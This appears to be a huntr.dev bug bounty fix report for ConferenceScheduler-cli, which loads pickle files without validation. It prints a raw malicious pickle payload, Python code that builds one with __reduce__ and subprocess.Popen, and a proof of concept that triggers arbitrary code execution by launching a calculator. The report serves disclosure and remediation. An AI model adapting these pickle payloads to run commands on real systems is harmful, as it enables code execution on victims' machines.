Security Fix for Arbitrary Code Execution - huntr.dev

[huntr-helper]

https://huntr.dev/users/mufeedvh has fixed the Arbitrary Code Execution vulnerability 🔨. mufeedvh has been awarded $25 for fixing the vulnerability through the huntr bug bounty program 💵. Think you could fix a vulnerability like this?

Get involved at https://huntr.dev/

Q | A
Version Affected | ALL
Bug Fix | YES
Original Pull Request | 418sec#1
GitHub Issue | #19
Vulnerability README | https://github.com/418sec/huntr/blob/master/bounties/pip/conferencescheduler-cli/1/README.md

User Comments:

📊 Metadata *

Bounty URL: https://www.huntr.dev/bounties/1-pip-conferencescheduler-cli

⚙️ Description *

The project ConferenceScheduler-cli loaded pickle files without restriction making it easier for an attacker to use a malicious pickle file payload to execute arbitrary commands.

💻 Technical Description *

The function import_schedule_definition() blindly loads a pickle file without any validation making it vulnerable to Arbitrary Code Execution. If the input pickle file is a malicious payload, for example, let's pop a calculator 😉:

csubprocess
Popen
p0
(S'calc.exe'
p1
tp2
Rp3
.

We can generate the above payload with:

import pickle

class generate_payload(object):
	def __reduce__(self):
    	import subprocess
    	return (subprocess.Popen, ('xcalc',))

payload = generate_payload()
file = open('malicious.pickle', 'wb')
pickle.dump(payload, file)
file.close()

🐛 Proof of Concept (PoC) *

from scheduler import io
import os
from pathlib import Path
import pickle

class generate_payload(object):
	def __reduce__(self):
    	import subprocess
    	return (subprocess.Popen, ('xcalc',))

payload = generate_payload()
file = open('solution\\scheduler.pickle', 'wb')
pickle.dump(payload, file)
file.close()
io.import_schedule_definition(Path(Path.cwd(), 'solution'))

🔥 Proof of Fix (PoF) *

👍 User Acceptance Testing (UAT)

No test cases.